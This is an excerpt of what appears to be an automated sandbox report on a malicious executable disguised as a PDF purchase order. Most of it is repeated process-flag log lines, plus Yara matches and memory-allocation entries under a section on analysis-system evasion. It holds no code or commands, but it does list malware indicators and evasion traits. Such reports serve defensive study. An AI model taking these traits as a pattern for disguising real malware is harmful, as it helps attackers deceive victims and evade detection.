                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 5260000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 8E40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: AA60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: BA60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: C410000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: D410000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: E410000 memory reserve | memory write watchJump to behavior
